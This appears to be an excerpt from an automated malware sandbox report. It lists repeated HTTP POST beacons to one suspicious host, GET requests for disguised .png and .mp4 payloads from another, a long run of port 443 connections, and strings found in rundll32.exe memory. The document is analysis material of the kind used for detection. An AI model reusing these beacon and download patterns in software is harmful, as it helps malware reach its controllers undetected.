Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: worldoptions.buzzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: worldoptions.buzzConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49276
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49271
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 49201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49227
Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 49261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49261
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49260
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49258
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49254
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49244
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49230
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49228
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 443

Source: rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com8 equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
